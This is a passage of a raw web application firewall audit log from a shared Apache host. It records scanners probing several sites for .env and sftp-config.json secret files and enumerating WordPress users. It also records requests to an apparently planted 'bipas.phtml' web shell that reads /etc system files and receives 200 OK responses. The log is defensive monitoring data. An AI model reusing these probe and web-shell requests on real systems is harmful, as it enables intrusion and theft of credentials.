_sfs_id=74c661c70f1ec9d7fff64aac42f23df31749976286; expires=Sun, 15 Jun 2025 09:31:26 GMT; Max-Age=3600; path=/; secure; HttpOnly Set-Cookie: PHPSESSID=q0csshs9ikqhthikgn7vslh2o6; expires=Sat, 13 Sep 2025 08:31:26 GMT; Max-Age=7776000; path=/; domain=www.retaxis.com; HttpOnly; SameSite=lax Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --8e735616-E-- --8e735616-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Message: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||www.retaxis.com|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.retaxis.com"] [uri "/"] [unique_id "aE6E3X15LOn2YRwTZIj42gAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator GE matched 5 at TX:incoming_points. [file "/etc/apache2/modsecurity.d/rules/comodo_free/20_Outgoing_FiltersEnd.conf"] [line "35"] [id "214930"] [rev "1"] [msg "COMODO WAF: Inbound Points Exceeded|Total Incoming Points: 5|www.retaxis.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "FiltersEnd"] [hostname "www.retaxis.com"] [uri "/index.php"] [unique_id "aE6E3X15LOn2YRwTZIj42gAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/retaxis.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749976285860616 1153784 (- - -) Stopwatch2: 1749976285860616 1153784; combined=2865, p1=486, p2=2092, p3=115, p4=35, p5=136, sr=102, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e735616-Z-- --c77e5e54-A-- [15/Jun/2025:14:04:16.348956 +0530] aE6FiN-DHezsSmx4Vom-YgAAAAI 100.28.44.58 57894 127.0.0.1 7081 --c77e5e54-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/time.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 100.28.44.58 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --c77e5e54-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4036 Connection: close Content-Type: text/html; charset=UTF-8 --c77e5e54-H-- Message: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/time.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/time.conf found within ARGS:viewfile: /etc/security/time.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6FiN-DHezsSmx4Vom-YgAAAAI"] Apache-Handler: application/x-httpd-php Stopwatch: 1749976456344609 4400 (- - -) Stopwatch2: 1749976456344609 4400; combined=2312, p1=473, p2=1714, p3=36, p4=36, p5=53, sr=136, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c77e5e54-Z-- --f6ace165-A-- [15/Jun/2025:14:09:56.762795 +0530] aE6G3E0nW1houYLyuKrLdAAAAA0 172.71.134.248 37256 127.0.0.1 7080 --f6ace165-B-- GET /sftp-config.json HTTP/1.0 Host: www.superrefrigerations.com X-Real-IP: 172.71.134.248 X-Forwarded-For: 13.39.16.88 X-Accel-Internal: /internal-nginx-static-location Connection: close cf-ray: 9500c282aa7d22b7-CDG Accept: */* accept-encoding: gzip User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 X-Forwarded-Proto: http cdn-loop: cloudflare; loops=1 CF-Connecting-IP: 13.39.16.88 CF-Visitor: {"scheme":"http"} CF-IPCountry: FR --f6ace165-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 14:06:59 GMT ETag: "328-623a72f4250b7" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --f6ace165-H-- Message: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.superrefrigerations.com"] [uri "/sftp-config.json"] [unique_id "aE6G3E0nW1houYLyuKrLdAAAAA0"] Stopwatch: 1749976796759743 3139 (- - -) Stopwatch2: 1749976796759743 3139; combined=1814, p1=391, p2=1356, p3=0, p4=0, p5=66, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6ace165-Z-- --21f33159-A-- [15/Jun/2025:14:15:51.760066 +0530] aE6IP_VbLd3MzwkmrE-MZAAAAAg 3.213.46.222 37320 127.0.0.1 7081 --21f33159-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/security&viewfile=//etc/security/namespace.conf HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 3.213.46.222 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --21f33159-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3646 Connection: close Content-Type: text/html; charset=UTF-8 --21f33159-H-- Message: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/security/namespace.conf" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/security/namespace.conf found within ARGS:viewfile: /etc/security/namespace.conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6IP_VbLd3MzwkmrE-MZAAAAAg"] Apache-Handler: application/x-httpd-php Stopwatch: 1749977151756166 3951 (- - -) Stopwatch2: 1749977151756166 3951; combined=2042, p1=349, p2=1568, p3=33, p4=35, p5=56, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --21f33159-Z-- --e6455d66-A-- [15/Jun/2025:14:16:07.708662 +0530] aE6IT1uSeWH5mc2ityz3GgAAAAE 34.196.114.170 51538 127.0.0.1 7081 --e6455d66-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/pam.d&viewfile=//etc/pam.d/proftpd HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 34.196.114.170 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --e6455d66-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3121 Connection: close Content-Type: text/html; charset=UTF-8 --e6455d66-H-- Message: Warning. Matched phrase "etc/pam.d/proftpd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/pam.d/proftpd found within ARGS:viewfile: /etc/pam.d/proftpd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/pam.d/proftpd" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/pam.d/proftpd found within ARGS:viewfile: /etc/pam.d/proftpd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6IT1uSeWH5mc2ityz3GgAAAAE"] Apache-Handler: application/x-httpd-php Stopwatch: 1749977167705177 3546 (- - -) Stopwatch2: 1749977167705177 3546; combined=1896, p1=307, p2=1463, p3=34, p4=38, p5=53, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e6455d66-Z-- --a2dd3734-A-- [15/Jun/2025:14:31:57.690699 +0530] aE6MBU86SWGxMlRL5UU66gAAAAU 78.153.140.222 47988 127.0.0.1 7080 --a2dd3734-B-- GET /.env HTTP/1.0 Host: www.printotech.com X-Real-IP: 78.153.140.222 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36 --a2dd3734-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 27 Dec 2024 11:52:48 GMT ETag: "328-62a3f1a0472fe" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --a2dd3734-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.printotech.com"] [uri "/.env"] [unique_id "aE6MBU86SWGxMlRL5UU66gAAAAU"] Stopwatch: 1749978117687517 3235 (- - -) Stopwatch2: 1749978117687517 3235; combined=1801, p1=439, p2=1295, p3=0, p4=0, p5=67, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a2dd3734-Z-- --2ccea15f-A-- [15/Jun/2025:14:35:01.480557 +0530] aE6MvX15LOn2YRwTZIj7egAAAAc 54.84.147.79 50510 127.0.0.1 7081 --2ccea15f-B-- GET /admin/images/products/6847417b2eb7c%20bipas.phtml?path=//etc/init.d&viewfile=//etc/init.d/ssh HTTP/1.0 Host: www.sarainternational.ae X-Real-IP: 54.84.147.79 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36 Accept-Encoding: gzip,deflate --2ccea15f-F-- HTTP/1.1 200 OK Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 4111 Connection: close Content-Type: text/html; charset=UTF-8 --2ccea15f-H-- Message: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Message: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:path. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:path: /etc/init.d"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6MvX15LOn2YRwTZIj7egAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "etc/init.d" at ARGS:viewfile. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.sarainternational.ae|F|2"] [data "Matched Data: etc/init.d found within ARGS:viewfile: /etc/init.d/ssh"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.sarainternational.ae"] [uri "/admin/images/products/6847417b2eb7c bipas.phtml"] [unique_id "aE6MvX15LOn2YRwTZIj7egAAAAc"] Apache-Handler: application/x-httpd-php Stopwatch: 1749978301475280 5339 (- - -) Stopwatch2: 1749978301475280 5339; combined=3052, p1=469, p2=2346, p3=47, p4=47, p5=143, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2ccea15f-Z-- --909e381c-A-- [15/Jun/2025:14:39:30.055037 +0530] aE6NyMZRGs9Zs5Qd_koPEQAAAAA 196.251.85.177 45044 127.0.0.1 7081 --909e381c-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.gulachi.com X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close Cookie: PHPSESSID=dbrbe5u297g1i2br2pihsvdc1d; _sfs_id=551132312f2314961938bc62061bec141749978566 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --909e381c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Robots-Tag: noindex Link: <https://www.gulachi.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type, X-OptinMonster-ApiKey X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin WPO-Cache-Status: not cached WPO-Cache-Message: This is a REST API request (identified by REST_REQUEST constant) Connection: close Content-Type: application/json; charset=UTF-8 --909e381c-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.gulachi.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.gulachi.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE6NyMZRGs9Zs5Qd_koPEQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/gulachi.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978568464218 1590936 (- - -) Stopwatch2: 1749978568464218 1590936; combined=2382, p1=436, p2=1829, p3=0, p4=0, p5=117, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --909e381c-Z-- --9da3b31c-A-- [15/Jun/2025:14:39:40.002258 +0530] aE6N0_PMR4vVu-R9olfJfAAAAAo 172.71.127.136 55676 127.0.0.1 7081 --9da3b31c-B-- GET /.env HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee0af8cfd145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --9da3b31c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --9da3b31c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env"] [unique_id "aE6N0_PMR4vVu-R9olfJfAAAAAo"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978579736577 265799 (- - -) Stopwatch2: 1749978579736577 265799; combined=1672, p1=341, p2=1203, p3=0, p4=0, p5=127, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9da3b31c-Z-- --3d206b59-A-- [15/Jun/2025:14:39:40.398872 +0530] aE6N1LIQi_ruyWEJ7bFMoQAAAAk 172.71.127.136 55706 127.0.0.1 7081 --3d206b59-B-- GET /app/.env HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee0d6e5dd145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --3d206b59-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --3d206b59-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/app/.env"] [unique_id "aE6N1LIQi_ruyWEJ7bFMoQAAAAk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978580123097 275882 (- - -) Stopwatch2: 1749978580123097 275882; combined=1832, p1=347, p2=1402, p3=0, p4=0, p5=82, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3d206b59-Z-- --2dcacb26-A-- [15/Jun/2025:14:39:40.774638 +0530] aE6N1FuSeWH5mc2ityz5CAAAAAE 172.71.127.136 55734 127.0.0.1 7081 --2dcacb26-B-- GET /.env.bak HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee0fec52d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --2dcacb26-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --2dcacb26-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.getcalley.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env.bak"] [unique_id "aE6N1FuSeWH5mc2ityz5CAAAAAE"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.getcalley.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.getcalley.com"] [uri "/.env.bak"] [unique_id "aE6N1FuSeWH5mc2ityz5CAAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978580519584 255138 (- - -) Stopwatch2: 1749978580519584 255138; combined=1908, p1=351, p2=1468, p3=0, p4=0, p5=88, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2dcacb26-Z-- --b9bca11f-A-- [15/Jun/2025:14:39:41.175591 +0530] aE6N1MZRGs9Zs5Qd_koPFgAAAAA 172.71.127.136 55764 127.0.0.1 7081 --b9bca11f-B-- GET /.env.example HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee1239b6d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 cf-connecting-ip: 185.177.72.201 --b9bca11f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.2.28 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cdn.gtranslate.net/>; rel=dns-prefetch Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 13669 Connection: close Content-Type: text/html; charset=UTF-8 --b9bca11f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.getcalley.com"] [uri "/.env.example"] [unique_id "aE6N1MZRGs9Zs5Qd_koPFgAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/getcalley.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749978580895029 280650 (- - -) Stopwatch2: 1749978580895029 280650; combined=1771, p1=386, p2=1281, p3=0, p4=0, p5=104, sr=105, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b9bca11f-Z-- --93313e4f-A-- [15/Jun/2025:14:39:41.571064 +0530] aE6N1X15LOn2YRwTZIj72QAAAAc 172.71.127.136 55774 127.0.0.1 7081 --93313e4f-B-- GET /.env.local HTTP/1.0 Host: www.getcalley.com X-Real-IP: 172.71.127.136 X-Forwarded-For: 185.177.72.201 Connection: close cf-ray: 9500ee14c879d145-CDG cf-visitor: {"scheme":"https"} cf-ipcountry: FR accept-encoding: gzip, br cdn-loop: cloudflare; loops=1 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 